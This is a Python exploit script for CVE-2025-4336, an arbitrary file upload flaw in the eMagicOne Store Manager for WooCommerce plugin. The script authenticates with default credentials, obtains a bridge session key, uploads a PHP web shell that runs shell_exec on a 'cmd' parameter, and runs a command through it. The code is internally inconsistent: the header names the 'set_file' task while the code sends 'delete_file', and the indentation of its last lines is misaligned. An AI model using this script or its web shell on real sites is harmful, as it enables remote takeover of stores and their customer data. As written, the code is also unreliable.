# Exploit Title: eMagicOne Store Manager for WooCommerce <= 1.2.5 - Arbitrary File Upload via set_file Task
# Date: 05/03/2025
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage:  https://emagicone.com
# Version: <= 1.2.5
# Tested on: 1.2.5
# CVE : CVE-2025-4336

import time
import urllib3
import hashlib
import argparse
import requests


def main():
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    ENTITY_TYPE = "."

    # Parse command line arguments
    parser = argparse.ArgumentParser(description="CVE-2025-4336: An exploit...")
    parser.add_argument("victim_url", help="Target url or ip address.")
    parser.add_argument("--username", default="1", help="Username for authentication (default: 1)")
    parser.add_argument("--password", default="1", help="Password for authentication (default: 1)")
    args = parser.parse_args()

    hash_val = hashlib.md5((args.username + args.password).encode()).hexdigest()

    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }

    print("[*] Requesting session key...")
    resp = session.post(
        f"{args.victim_url}/?connector=bridge",
        data={
            "hash": hash_val,
            "task": "get_version"
        },
        headers=headers,
        verify=False
    )
    print("[*] Raw response:", resp.text)
    try:
        session_key = resp.json().get("session_key")
    except Exception:
        print("[-] Failed to parse session key from response:", resp.text)
        exit(1)

    if not session_key:
        print("[-] No session key returned!")
        exit(1)
    print("[+] Got session key:", session_key)
    time.sleep(2)

    upload_url = (
        f"{args.victim_url}/?connector=bridge"
        f"&task=delete_file"
        f"&key={session_key}"
        f"&path=./test.txt"
    )

    shell_content  = b"<?php\n"
    shell_content += b"// Silence is golden\n"
    shell_content += b"if (!empty($_GET['cmd'])) {\n"
    shell_content += b"    echo \"<pre>\".shell_exec($_GET[\"cmd\"]).\"</pre>\";\n"
    shell_content += b"}\n"
    shell_content += b"?>\r\n"

    files = {
        "file": ("shell.php", shell_content, "text/plain")
    }

    print("[*] Uploading file...")
    resp = session.post(upload_url, files=files, headers=headers, verify=False)
    print("[*] Upload response:", resp.text)

   print("[*] Executing Web Shell Commands...")
   r = requests.get(f"{args.victim_url}/shell.php?cmd=ip addr", verify=False)
   print(r.text)


if __name__ == "__main__":
    main()